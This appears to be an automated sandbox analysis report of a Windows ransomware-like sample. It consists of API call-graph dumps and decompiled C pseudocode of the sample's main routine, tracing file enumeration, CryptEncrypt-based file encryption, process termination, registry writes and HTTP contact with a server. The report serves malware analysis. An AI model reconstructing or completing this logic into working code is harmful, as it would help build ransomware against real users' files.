1945->1941 1945->1942 1946 40764a lstrcpyW lstrcatW 1945->1946 1947 40765f lstrcatW lstrcatW 1945->1947 1948 407697 Process32NextW 1945->1948 1949 407670 lstrlenW 1946->1949 1947->1949 1948->1941 1950 4076a8 GetLastError 1948->1950 1949->1948 1950->1941 1950->1945 1961 4077f0 InternetOpenW 1951->1961 1955 406946 1956 406971 VirtualFree 1955->1956 1957 40694a lstrlenA 1955->1957 1959 406986 InternetCloseHandle 1956->1959 1960 40698d 1956->1960 1957->1956 1958 40695a wsprintfW 1957->1958 1958->1956 1959->1960 1960->1847 1960->1857 1962 406902 VirtualAlloc lstrlenW 1961->1962 1963 4079dd InternetOpenW 1961->1963 1964 407a00 1962->1964 1963->1962 1965 407a12 InternetCloseHandle 1964->1965 1966 407a19 1964->1966 1965->1966 1967 4077f0 2 API calls 1966->1967 1968 407a20 InternetConnectW 1967->1968 1969 407a51 VirtualAlloc wsprintfW HttpOpenRequestW 1968->1969 1970 407a48 1968->1970 1971 407aa1 HttpAddRequestHeadersW 1969->1971 1972 407b72 InternetCloseHandle InternetCloseHandle VirtualFree 1969->1972 1970->1955 1971->1972 1973 407b06 HttpSendRequestW 1971->1973 1972->1955 1974 407b6c GetLastError 1973->1974 1975 407b1d InternetReadFile 1973->1975 1974->1972 1975->1972 1976 407b3c 1975->1976 1976->1972 1977 407b47 InternetReadFile 1976->1977 1977->1976 1978 407b6a 1977->1978 1978->1972 1979->1685 1981 405dd5 CryptGenKey 1980->1981 1982 405d9f GetLastError 1980->1982 1985 405df1 1981->1985 1986 405df2 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 1981->1986 1983 405dac CryptAcquireContextW 1982->1983 1984 405dc5 1982->1984 1983->1984 1987 405dcc 1983->1987 1984->1625 1985->1986 1986->1984 1987->1981 1988->1706 1990 408b3c 1989->1990 1990->1733 1990->1990 1992 4077f0 2 API calls 1991->1992 1993 40538c 1992->1993 2009 404eb0 VirtualAlloc 1993->2009 1996 4053d3 lstrcatA lstrcatA lstrlenA 1998 408b30 _memset 1996->1998 1999 405462 lstrcpyW 1998->1999 2018 405270 VirtualAlloc GetModuleFileNameW CreateFileW 1999->2018 2001 405482 lstrlenW lstrlenA 2002 407a00 15 API calls 2001->2002 2003 4054c4 2002->2003 2004 4054f8 VirtualFree VirtualFree VirtualFree 2003->2004 2028 405050 lstrlenA VirtualAlloc 2003->2028 2005 405527 InternetCloseHandle 2004->2005 2006 40552e 2004->2006 2005->2006 2006->1745 2006->1746 2008 4054e4 2008->2004 2010 404fc0 lstrlenA VirtualAlloc VirtualAlloc 2009->2010 2011 404f2e 2009->2011 2010->1996 2012 404f52 lstrlenW VirtualAlloc 2011->2012 2013 404f47 Sleep 2011->2013 2058 404d60 CreatePipe 2012->2058 2013->2012 2015 404f78 lstrcmpiA 2016 404fa0 wsprintfW VirtualFree 2015->2016 2017 404f88 VirtualFree 2015->2017 2016->2010 2017->2011 2019 405357 VirtualFree 2018->2019 2020 4052c9 CreateFileMappingW 2018->2020 2019->2001 2021 405350 CloseHandle 2020->2021 2022 4052e1 MapViewOfFile 2020->2022 2021->2019 2023 405347 CloseHandle 2022->2023 2024 4052f7 lstrlenW lstrlenA 2022->2024 2023->2021 2025 405314 lstrlenA 2024->2025 2026 405338 UnmapViewOfFile 2024->2026 2025->2026 2026->2023 2029 40508b CryptStringToBinaryA 2028->2029 2031 4050b3 _memset 2029->2031 2032 40525e GetLastError 2029->2032 2034 4050f7 lstrlenA 2031->2034 2033 405245 VirtualFree 2032->2033 2033->2008 2035 405113 2034->2035 2087 4033e0 2035->2087 2038 405266 2097 404fd0 VirtualAlloc VirtualAlloc 2038->2097 2039 40513f 2040 405151 lstrlenA VirtualAlloc 2039->2040 2041 4051ee 2039->2041 2046 405171 CryptStringToBinaryA 2040->2046 2044 4051f5 lstrlenA VirtualAlloc 2041->2044 2045 40521a 2041->2045 2044->2045 2047 405212 lstrcpyA 2044->2047 2048 405236 2045->2048 2053 40522e HeapFree 2045->2053 2051 405194 VirtualAlloc 2046->2051 2052 4051de VirtualFree 2046->2052 2047->2045 2050 405242 2048->2050 2056 40523f HeapFree 2048->2056 2050->2033 2054 4051b0 MultiByteToWideChar 2051->2054 2055 4051ca 2051->2055 2052->2041 2053->2048 2054->2055 2057 4051d2 GetLastError 2054->2057 2055->2052 2056->2050 2057->2055 2059 404e09 SetHandleInformation 2058->2059 2060 404dff 2058->2060 2059->2060 2061 404e1f CreatePipe SetHandleInformation 2059->2061 2060->2015 2061->2060 2062 404e45 VirtualAlloc 2061->2062 2063 404e95 lstrcpyA 2062->2063 2064 404e5f wsprintfW 2062->2064 2063->2015 2069 404b10 2064->2069 2066 404e75 2074 404cb0 2066->2074 2070 408b30 _memset 2069->2070 2071 404b2e CreateProcessW 2070->2071 2072 404b84 CloseHandle CloseHandle 2071->2072 2073 404b79 GetLastError 2071->2073 2072->2066 2073->2066 2079 404cbd 2074->2079 2075 404cc6 ReadFile 2076 404d35 2075->2076 2075->2079 2077 404d53 VirtualFree 2076->2077 2080 404ba0 2076->2080 2077->2015 2079->2075 2079->2076 2083 404bcb 2080->2083 2081 404c05 lstrcpyA 2081->2077 2082 404c63 lstrlenA 2084 404c70 lstrcpyA 2082->2084 2083->2081 2083->2082 2085 404c5d 2083->2085 2084->2077 2085->2081 2101 4032b0 lstrlenA 2087->2101 2090 4034d9 ExitProcess 2092 403412 2092->2038 2092->2039 2094 403483 lstrlenA GetProcessHeap HeapAlloc 2095 403407 2094->2095 2096 4034a5 lstrcpyA 2094->2096 2095->2092 2095->2094 2105 403190 2095->2105 2109 403200 2095->2109 2096->2095 2098 405000 GetModuleFileNameW 2097->2098 2099 405039 ExitProcess 2097->2099 2098->2099 2100 405012 wsprintfW ShellExecuteW 2098->2100 2100->2099 2102 4032f8 2101->2102 2103 4032cf 2101->2103 2102->2090 2102->2095 2104 4032d0 lstrlenA 2103->2104 2104->2102 2104->2104 2106 4031b0 lstrcmpiA lstrcmpiA 2105->2106 2108 40319e 2105->2108 2106->2095 2107 4031f1 2107->2095 2108->2106 2108->2107 2111 403210 2109->2111 2110 40323d 2110->2095 2111->2110 2112 403250 lstrlenA GetProcessHeap HeapAlloc 2111->2112 2113 40326d 2111->2113 2114 40328d 2112->2114 2115 403272 lstrlenA GetProcessHeap HeapAlloc 2113->2115 2116 403299 2113->2116 2114->2116 2117 403291 lstrcpyA 2114->2117 2115->2114 2116->2095 2117->2116 2118->1756 2120 40556c wsprintfW 2119->2120 2145 4039b0 GetProcessHeap 2120->2145 2123 4055bf 2124 406d90 105 API calls 2123->2124 2125 4055ca 2124->2125 2126 406ba0 16 API calls 2125->2126 2127 4055d5 lstrlenW 2126->2127 2128 4069a0 49 API calls 2127->2128 2129 4055ed lstrlenW 2128->2129 2130 408b30 _memset 2129->2130 2131 405636 lstrlenA 2130->2131 2132 405652 2131->2132 2133 405667 CryptBinaryToStringA 2132->2133 2134 405692 lstrlenA VirtualAlloc lstrlenA 2133->2134 2135 40568c GetLastError 2133->2135 2136 4056be lstrlenA 2134->2136 2135->2134 2138 4056f2 2136->2138 2142 4056d5 lstrlenA 2136->2142 2139 405370 104 API calls 2138->2139 2141 4056fe VirtualFree 2139->2141 2143 407720 10 API calls 2141->2143 2142->2138 2144 40572d VirtualFree 2143->2144 2144->1764 2145->2123 2147 408b30 _memset 2146->2147 2148 403b37 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2147->2148 2148->1771 2149 406840 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2152 4066f0 2149->2152 2151 4068d0 VirtualFree ExitThread 2171 406110 VirtualAlloc 2152->2171 2154 406706 2155 406834 2154->2155 2183 4064a0 lstrlenW lstrcatW FindFirstFileW 2154->2183 2155->2151 2157 406715 2157->2155 2198 406640 VirtualAlloc wsprintfW CreateFileW 2157->2198 2159 406722 lstrlenW lstrcatW FindFirstFileW 2160 406764 2159->2160 2161 406758 2159->2161 2162 406770 lstrcmpW 2160->2162 2161->2151 2163 406813 FindNextFileW 2162->2163 2164 40678a lstrcmpW 2162->2164 2163->2162 2165 40682b FindClose 2163->2165 2164->2163 2166 4067a0 lstrcatW 2164->2166 2165->2155 2167 4067cc 2166->2167 2168 4067b3 lstrcatW 2166->2168 2167->2163 2204 4063b0 VirtualAlloc wsprintfW 2167->2204 2170 4066f0 95 API calls 2168->2170 2170->2167 2173 406137 2171->2173 2172 406228 VirtualFree 2172->2154 2173->2172 2174 4061a3 SHGetSpecialFolderPathW 2173->2174 2175 4061c1 SHGetSpecialFolderPathW 2174->2175 2176 4061b4 2174->2176 2177 4061db SHGetSpecialFolderPathW 2175->2177 2178 4061ce 2175->2178 2176->2172 2176->2175 2179 4061f5 SHGetSpecialFolderPathW 2177->2179 2180 4061e8 2177->2180 2178->2172 2178->2177 2181 406202 2179->2181 2182 40620f VirtualFree 2179->2182 2180->2172 2180->2179 2181->2172 2181->2182 2182->2154 2184 4064f0 lstrcmpW 2183->2184 2185 406612 FindNextFileW 2184->2185 2186 406506 lstrcmpW 2184->2186 2185->2184 2187 40662a FindClose 2185->2187 2186->2185 2188 40651c lstrcatW lstrlenW 2186->2188 2187->2157 2197 40653f 2188->2197 2189 406554 lstrcmpW 2190 406564 CreateFileW GetFileSize 2189->2190 2189->2197 2191 406591 VirtualAlloc 2190->2191 2192 4065f2 CloseHandle 2190->2192 2193 4065a6 ReadFile 2191->2193 2191->2197 2192->2187 2192->2197 2194 4065e1 VirtualFree 2193->2194 2193->2197 2194->2197 2195 4065c9 lstrlenA 2212 406440 lstrlenA 2195->2212 2197->2185 2197->2189 2197->2192 2197->2194 2197->2195 2199 40668c GetLastError 2198->2199 2200 40669e 2198->2200 2201 4066d0 VirtualFree 2199->2201 2202 4066c4 CloseHandle 2200->2202 2203 4066a7 lstrlenW WriteFile 2200->2203 2201->2159 2202->2201 2203->2202 2214 406300 2204->2214 2206 4063ea 2207 406407 VirtualFree 2206->2207 2218 406240 lstrlenW lstrlenW 2206->2218 2207->2167 2210 406403 2210->2207 2230 4035e0 GetFileAttributesW SetFileAttributesW 2210->2230 2213 40645a 2212->2213 2213->2197 2215 406313 lstrlenW 2214->2215 2216 40630c 2214->2216 2217 406325 2215->2217 2216->2206 2217->2206 2219 40625c 2218->2219 2220 40626e lstrcmpiW 2218->2220 2219->2220 2221 406283 2220->2221 2222 40628c lstrcmpiW 2220->2222 2221->2210 2222->2221 2223 406298 lstrcmpiW 2222->2223 2223->2221 2224 4062a4 lstrcmpiW 2223->2224 2224->2221 2225 4062b0 lstrcmpiW 2224->2225 2225->2221 2226 4062bc lstrcmpiW 2225->2226 2226->2221 2227 4062c8 lstrcmpiW 2226->2227 2227->2221 2228 4062d4 lstrcmpiW 2227->2228 2228->2221 2229 4062e0 lstrcmpiW 2228->2229 2229->2210 2257 405ea0 2230->2257 2234 4036a5 2235 407db0 9 API calls 2234->2235 2236 4036b5 VirtualAlloc VirtualAlloc 2235->2236 2270 406000 EnterCriticalSection CryptAcquireContextW 2236->2270 2239 403976 2240 403990 VirtualFree 2239->2240 2240->2207 2241 406000 10 API calls 2242 40374a 2241->2242 2243 403751 GetLastError 2242->2243 2244 40375c 2242->2244 2243->2239 2245 40376f CreateFileW 2244->2245 2245->2239 2246 40379b VirtualAlloc VirtualAlloc 2245->2246 2247 4037d4 ReadFile 2246->2247 2248 4038e0 VirtualFree 2247->2248 2256 4037d1 _memmove 2247->2256 2249 4038f6 WriteFile WriteFile WriteFile 2248->2249 2250 40392a CloseHandle VirtualFree VirtualFree VirtualFree 2248->2250 2249->2250 2250->2240 2251 40396a MoveFileW 2250->2251 2251->2240 2252 403828 VirtualAlloc 2252->2256 2253 403847 VirtualAlloc 2254 403885 VirtualFree SetFilePointer WriteFile 2253->2254 2253->2256 2255 4038c7 VirtualFree 2254->2255 2254->2256 2255->2248 2255->2256 2256->2247 2256->2248 2256->2252 2256->2253 2256->2254 2256->2255 2258 403626 VirtualAlloc lstrcpyW lstrcatW 2257->2258 2259 407db0 CryptAcquireContextW 2258->2259 2260 407ea2 2259->2260 2261 407dde VirtualAlloc 2259->2261 2260->2234 2263 407e08 2261->2263 2264 407eab CryptReleaseContext VirtualFree 2261->2264 2263->2264 2265 407e11 GetModuleHandleA 2263->2265 2264->2234 2266 407e65 GetProcAddress 2265->2266 2267 407e57 LoadLibraryA 2265->2267 2268 407e89 CryptReleaseContext VirtualFree 2266->2268 2269 407e74 2266->2269 2267->2266 2267->2268 2268->2260 2269->2268 2271 406038 GetLastError 2270->2271 2272 40606e CryptImportKey 2270->2272 2273 406045 CryptAcquireContextW 2271->2273 2274 403724 2271->2274 2275 4060f2 CryptReleaseContext LeaveCriticalSection 2272->2275 2276 406093 CryptGetKeyParam CryptEncrypt GetLastError 2272->2276 2273->2274 2277 406065 2273->2277 2274->2239 2274->2241 2275->2274 2276->2275 2278 4060ea 2276->2278 2277->2272 2278->2275 2279 408bc0 IsProcessorFeaturePresent 2280 408be6 2279->2280 2315 402c50 2316 402cda CreateThread DestroyWindow 2315->2316 2317 402c7b 2315->2317 2318 402c80 DefWindowProcW 2317->2318 2319 402c97 BeginPaint lstrlenW TextOutW EndPaint 2317->2319 2320 402d10 SendMessageW ExitThread 2321 402d30 2342 402f50 EnumDeviceDrivers 2321->2342 2323 402d8c 2324 402de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2323->2324 2327 402f50 7 API calls 2323->2327 2325 402e75 ExitThread 2324->2325 2326 402e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2324->2326 2328 402ec5 ShowWindow UpdateWindow CreateThread 2326->2328 2329 402ebe ExitThread 2326->2329 2330 402d99 2327->2330 2331 402ef4 GetMessageW 2328->2331 2332 402eed CloseHandle 2328->2332 2330->2324 2335 402f50 7 API calls 2330->2335 2333 402f0b 2331->2333 2334 402f3d ExitThread 2331->2334 2332->2331 2336 402f17 TranslateMessage DispatchMessageW 2333->2336 2337 402dce 2335->2337 2336->2334 2338 402f2c GetMessageW 2336->2338 2337->2334 2352 4030a0 2337->2352 2338->2334 2338->2336 2343 402f82 VirtualAlloc 2342->2343 2344 402f7d 2342->2344 2345 402f99 2343->2345 2346 402f9f EnumDeviceDrivers 2343->2346 2344->2323 2345->2323 2347 402ff2 VirtualFree 2346->2347 2348 402fae 2346->2348 2347->2323 2348->2347 2349 402fc0 GetDeviceDriverBaseNameW 2348->2349 2349->2348 2350 402fd9 lstrcmpiW 2349->2350 2350->2348 2351 403009 VirtualFree 2350->2351 2351->2323 2353 402f50 7 API calls 2352->2353 2354 403151 2353->2354 2355 402f50 7 API calls 2354->2355 2360 402ddb 2354->2360 2356 403160 2355->2356 2357 402f50 7 API calls 2356->2357 2356->2360 2358 40316c 2357->2358 2359 402f50 7 API calls 2358->2359 2358->2360 2359->2360 2360->2334 2361 402ad0 VirtualAlloc 2360->2361 2362 402b02 GetModuleFileNameW GetTempPathW 2361->2362 2364 402b48 2362->2364 2365 402b53 lstrlenW 2364->2365 2366 402b4c 2364->2366 2376 407c60 CryptAcquireContextW 2365->2376 2404 402960 lstrlenW 2366->2404 2368 402b8e GetEnvironmentVariableW 2370 402bac 2368->2370 2372 402bd8 lstrcatW lstrcatW lstrcatW 2370->2372 2375 402bb0 2370->2375 2371 402c45 ExitThread 2387 402890 CreateFileW 2372->2387 2374 402c2f wsprintfW 2374->2366 2375->2371 2375->2374 2377 407d79 2376->2377 2378 407c8b VirtualAlloc 2376->2378 2377->2368 2380 407d82 CryptReleaseContext VirtualFree 2378->2380 2381 407cbb 2378->2381 2380->2368 2381->2380 2382 407cc3 GetModuleHandleA 2381->2382 2383 407d17 GetProcAddress 2382->2383 2384 407d09 LoadLibraryA 2382->2384 2386 407d26 CryptReleaseContext VirtualFree 2383->2386 2384->2383 2384->2386 2386->2377 2388 4028b8 GetFileSize 2387->2388 2389 4028f9 2387->2389 2409 403030 2388->2409 2389->2375 2392 403030 7 API calls 2393 4028d5 CreateFileMappingW 2392->2393 2394 402902 MapViewOfFile 2393->2394 2395 4028f2 CloseHandle 2393->2395 2396 402916 2394->2396 2397 402948 CloseHandle CloseHandle 2394->2397 2395->2389 2398 403030 7 API calls 2396->2398 2397->2375 2399 40291b 2398->2399 2400 407db0 9 API calls 2399->2400 2402 40292b 2399->2402 2400->2402 2414 402830 CreateFileW 2402->2414 2405 407c60 9 API calls 2404->2405 2406 4029ad RegCreateKeyExW 2405->2406 2407 402ac0 2406->2407 2408 402a8e lstrlenW RegSetValueExW RegCloseKey 2406->2408 2407->2371 2408->2371 2410 402f50 7 API calls 2409->2410 2411 40307f 2410->2411 2412 402f50 7 API calls 2411->2412 2413 4028c8 2411->2413 2412->2413 2413->2392 2415 40285b 2414->2415 2416 40287f UnmapViewOfFile 2414->2416 2417 402873 2415->2417 2418 40285f WriteFile 2415->2418 2416->2397 2419 402878 CloseHandle 2417->2419 2418->2417 2418->2419 2419->2416 2281 404186 2289 404190 2281->2289 2282 404236 2284 4042d1 VirtualAlloc 2282->2284 2285 404302 VirtualFree 2282->2285 2283 4041c0 lstrcpyW lstrlenW 2283->2282 2283->2289 2284->2285 2286 4042ed wsprintfW 2284->2286 2287 407720 10 API calls 2285->2287 2286->2285 2288 40431c 2287->2288 2289->2282 2289->2283 2420 4047f8 2421 404800 lstrcmpiW 2420->2421 2422 4047f4 2421->2422 2423 40480f OpenProcess 2421->2423 2422->2421 2425 404844 Process32NextW 2422->2425 2423->2422 2424 404821 TerminateProcess CloseHandle 2423->2424 2424->2422 2425->2422 2426 404857 2425->2426 2427 404869 CloseHandle 2426->2427 2428 40485b VirtualFree 2426->2428 2428->2427 2290 406769 2291 406770 lstrcmpW 2290->2291 2292 406813 FindNextFileW 2291->2292 2293 40678a lstrcmpW 2291->2293 2292->2291 2294 40682b FindClose 2292->2294 2293->2292 2295 4067a0 lstrcatW 2293->2295 2297 406834 2294->2297 2296 4067b3 lstrcatW 2295->2296 2300 4067cc 2295->2300 2299 4066f0 104 API calls 2296->2299 2298 4063b0 62 API calls 2298->2300 2299->2300 2300->2292 2300->2298 2301 407369 2302 407370 GetDriveTypeW 2301->2302 2310 40738e 2302->2310 2303 407397 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 2305 407471 lstrcatW 2303->2305 2303->2310 2304 407491 lstrlenW 2306 4074a0 2304->2306 2305->2310 2307 4074a9 VirtualAlloc 2306->2307 2308 4074e4 2306->2308 2307->2308 2309 4074c7 2307->2309 2311 4068f0 21 API calls 2309->2311 2310->2302 2310->2303 2310->2304 2312 40740a lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 2310->2312 2313 4074ce 2311->2313 2312->2310 2313->2308 2314 4074d2 VirtualFree 2313->2314 2314->2308

                                      Callgraph

                                      • Executed
                                      • Not Executed
                                      • Opacity -> Relevance
                                      • Disassembly available
                                      callgraph 0 Function_00405FC0 1 Function_00406240 2 Function_00405540 5 Function_00405C40 2->5 34 Function_00405370 2->34 38 Function_00405CF0 2->38 65 Function_00406D90 2->65 74 Function_00407720 2->74 80 Function_004069A0 2->80 81 Function_00406BA0 2->81 93 Function_004039B0 2->93 94 Function_00408B30 2->94 3 Function_00404640 4 Function_00403FC0 4->0 17 Function_00403DE0 4->17 53 Function_00405F80 4->53 5->94 6 Function_00406440 7 Function_00406640 8 Function_00406840 42 Function_004066F0 8->42 9 Function_00408BC0 10 Function_00405050 10->5 16 Function_00404FD0 10->16 25 Function_004033E0 10->25 10->38 10->94 11 Function_00402C50 12 Function_00405750 12->5 12->34 12->38 12->65 12->74 12->80 12->81 12->93 12->94 13 Function_00402F50 14 Function_00404550 14->65 14->74 14->80 14->81 14->93 15 Function_00402AD0 19 Function_00402960 15->19 20 Function_00407C60 15->20 67 Function_00402890 15->67 75 Function_00407BA0 15->75 17->2 18 Function_00405E60 19->20 21 Function_00404D60 59 Function_00404B10 21->59 85 Function_00404CB0 21->85 22 Function_00403AE0 22->94 23 Function_00403A60 24 Function_004035E0 26 Function_004084E0 24->26 27 Function_00407EE0 24->27 46 Function_00403500 24->46 50 Function_00406000 24->50 69 Function_00405EA0 24->69 88 Function_00407DB0 24->88 47 Function_00403200 25->47 66 Function_00403190 25->66 76 Function_00403320 25->76 82 Function_004032B0 25->82 28 Function_00408AE4 29 Function_00408768 30 Function_00406769 30->42 87 Function_004063B0 30->87 31 Function_00407369 35 Function_00408470 31->35 43 Function_004068F0 31->43 32 Function_004088EC 33 Function_00405EF0 54 Function_00405D80 33->54 34->10 36 Function_004077F0 34->36 37 Function_00405270 34->37 52 Function_00407A00 34->52 83 Function_00404EB0 34->83 34->94 39 Function_00403FF0 40 Function_004034F0 41 Function_00404AF0 72 Function_004048A0 41->72 42->7 42->42 62 Function_00406110 42->62 79 Function_004064A0 42->79 42->87 43->36 43->52 44 Function_004047F8 45 Function_00404880 48 Function_00402000 49 Function_00404B00 50->40 51 Function_00406300 52->36 55 Function_00404186 55->74 55->75 56 Function_00408A09 57 Function_0040878C 58 Function_0040888E 59->94 60 Function_00402D10 61 Function_00406D10 62->75 63 Function_00407C10 64 Function_00407510 65->35 65->43 65->61 73 Function_00407520 65->73 67->88 91 Function_00402830 67->91 92 Function_00403030 67->92 68 Function_00408914 70 Function_00404BA0 71 Function_004040A0 71->65 71->74 71->75 71->80 71->81 71->93 72->0 72->3 72->4 72->12 72->14 72->17 72->18 72->23 72->33 72->39 72->45 72->69 72->71 77 Function_00403BA0 72->77 84 Function_00404330 72->84 77->22 77->23 78 Function_004030A0 78->13 79->6 79->63 83->21 84->22 85->70 89 Function_004084B0 85->89 86 Function_00408730 87->1 87->24 87->51 90 Function_00402D30 90->13 90->15 90->78 92->13 95 Function_004088BC

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E004048A0(void* __ecx) {
                                      				void* _v8;
                                      				CHAR* _v12;
                                      				int _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				void* _v32;
                                      				void* _v36;
                                      				void* _v40;
                                      				int _v44;
                                      				int _v48;
                                      				void* _v52;
                                      				char _v72;
                                      				void* _t50;
                                      				int _t75;
                                      				void* _t77;
                                      				short* _t98;
                                      				void* _t102;
                                      
                                      				_t82 = __ecx;
                                      				Sleep(0x3e8); // executed
                                      				_t50 = E00404550(_t82); // executed
                                      				if(_t50 != 0) {
                                      					ExitProcess(0); // executed
                                      				}
                                      				_v8 = CreateThread(0, 0, E00402D30, 0, 0, 0);
                                      				if(_v8 != 0) {
                                      					if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
                                      						_t82 = _v8;
                                      						TerminateThread(_v8, 0);
                                      					}
                                      					CloseHandle(_v8);
                                      				}
                                      				E00404640();
                                      				E004040A0(_t82);
                                      				E00405EF0( &_v72);
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				_v24 = 0;
                                      				_v40 = 0;
                                      				_t97 =  &_v40;
                                      				E00405EA0( &_v72,  &_v24,  &_v40,  &_v36,  &_v32);
                                      				_v44 = 0;
                                      				_v12 = 0;
                                      				if(E00404880(_v24) != 0) {
                                      					ExitProcess(0);
                                      				}
                                      				L8:
                                      				while(_v44 == 0) {
                                      					_t97 = _v40;
                                      					_t77 = E00405750(_v24, _v40, _v36, _v32,  &_v12);
                                      					_t102 = _t102 + 0xc;
                                      					if(_t77 != 0) {
                                      						_v44 = 1;
                                      					} else {
                                      						Sleep(0x2710);
                                      					}
                                      				}
                                      				E00405E60( &_v72);
                                      				_v28 = 0;
                                      				_v16 = 0;
                                      				_v48 = 0;
                                      				_v52 = 0;
                                      				__eflags = _v12;
                                      				if(_v12 != 0) {
                                      					_v16 = lstrlenA(_v12);
                                      					_v28 = VirtualAlloc(0, _v16, 0x3000, 4);
                                      					_t97 = _v12;
                                      					_t75 = CryptStringToBinaryA(_v12, 0, 1, _v28,  &_v16, 0, 0);
                                      					__eflags = _t75;
                                      					if(_t75 == 0) {
                                      						ExitProcess(0);
                                      					}
                                      					_v48 = 1;
                                      				}
                                      				E00403FF0();
                                      				InitializeCriticalSection(0x412ae8);
                                      				__eflags = _v48;
                                      				if(__eflags == 0) {
                                      					E00403DE0( &_v72);
                                      				} else {
                                      					_t97 = _v16;
                                      					E00403FC0(_v28, _v16, __eflags);
                                      				}
                                      				DeleteCriticalSection(0x412ae8);
                                      				__eflags = E00403A60();
                                      				if(__eflags != 0) {
                                      					E00404330(__eflags);
                                      				}
                                      				_v20 = VirtualAlloc(0, 0x200, 0x3000, 4);
                                      				__eflags = _v20;
                                      				if(__eflags != 0) {
                                      					GetModuleFileNameW(0, _v20, 0x100);
                                      					E00403BA0(_v20, _t97, __eflags);
                                      					VirtualFree(_v20, 0, 0x8000);
                                      				}
                                      				__eflags =  *0x412ae4;
                                      				if( *0x412ae4 != 0) {
                                      					_t98 =  *0x412ae4; // 0x8d0000
                                      					ShellExecuteW(0, L"open", _t98, 0, 0, 5);
                                      				}
                                      				return E00405FC0( &_v72);
                                      				goto L8;
                                      			}





















                                      0x004048a0
                                      0x004048ab
                                      0x004048b1
                                      0x004048b8
                                      0x004048bc
                                      0x004048bc
                                      0x004048d7
                                      0x004048de
                                      0x004048f4
                                      0x004048f8
                                      0x004048fc
                                      0x004048fc
                                      0x00404906
                                      0x00404906
                                      0x0040490c
                                      0x00404911
                                      0x00404919
                                      0x0040491e
                                      0x00404925
                                      0x0040492c
                                      0x00404933
                                      0x00404942
                                      0x0040494d
                                      0x00404952
                                      0x00404959
                                      0x0040496a
                                      0x0040496e
                                      0x0040496e
                                      0x00000000
                                      0x00404974
                                      0x00404986
                                      0x0040498c
                                      0x00404991
                                      0x00404996
                                      0x004049a5
                                      0x00404998
                                      0x0040499d
                                      0x0040499d
                                      0x004049ac
                                      0x004049b1
                                      0x004049b6
                                      0x004049bd
                                      0x004049c4
                                      0x004049cb
                                      0x004049d2
                                      0x004049d6
                                      0x004049e2
                                      0x004049f8
                                      0x00404a0b
                                      0x00404a0f
                                      0x00404a15
                                      0x00404a17
                                      0x00404a1b
                                      0x00404a1b
                                      0x00404a21
                                      0x00404a21
                                      0x00404a28
                                      0x00404a32
                                      0x00404a38
                                      0x00404a3c
                                      0x00404a4e
                                      0x00404a3e
                                      0x00404a3e
                                      0x00404a44
                                      0x00404a44
                                      0x00404a58
                                      0x00404a63
                                      0x00404a65
                                      0x00404a67
                                      0x00404a67
                                      0x00404a80
                                      0x00404a83
                                      0x00404a87
                                      0x00404a94
                                      0x00404a9d
                                      0x00404aad
                                      0x00404aad
                                      0x00404ab3
                                      0x00404aba
                                      0x00404ac2
                                      0x00404ad0
                                      0x00404ad0
                                      0x00404ae1
                                      0x00000000

                                      APIs
                                      • Sleep.KERNELBASE(000003E8), ref: 004048AB
                                        • Part of subcall function 00404550: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
                                        • Part of subcall function 00404550: lstrcpyW.KERNEL32 ref: 004045CF
                                        • Part of subcall function 00404550: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
                                        • Part of subcall function 00404550: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
                                        • Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
                                        • Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
                                        • Part of subcall function 00404550: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B
                                      • ExitProcess.KERNEL32 ref: 004048BC
                                      • CreateThread.KERNEL32 ref: 004048D1
                                      • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004048E9
                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 004048FC
                                      • CloseHandle.KERNEL32(00000000), ref: 00404906
                                      • ExitProcess.KERNEL32 ref: 0040496E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorExitLastProcessThreadVirtual$AllocCloseFreeHandleMutexObjectSingleSleepTerminateWaitlstrcpylstrlen
                                      • String ID: open
                                      • API String ID: 3160775492-2758837156
                                      • Opcode ID: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
                                      • Instruction ID: 2fe3139fa9bd6d9f2b7618e63861a0a4b2c33c0f11c60c5fb30394d5f0607533
                                      • Opcode Fuzzy Hash: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
                                      • Instruction Fuzzy Hash: FD612CB0A40209ABEB14EFA1DD4ABEF7774AB84705F104029F601BA2D1DBB85E45CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
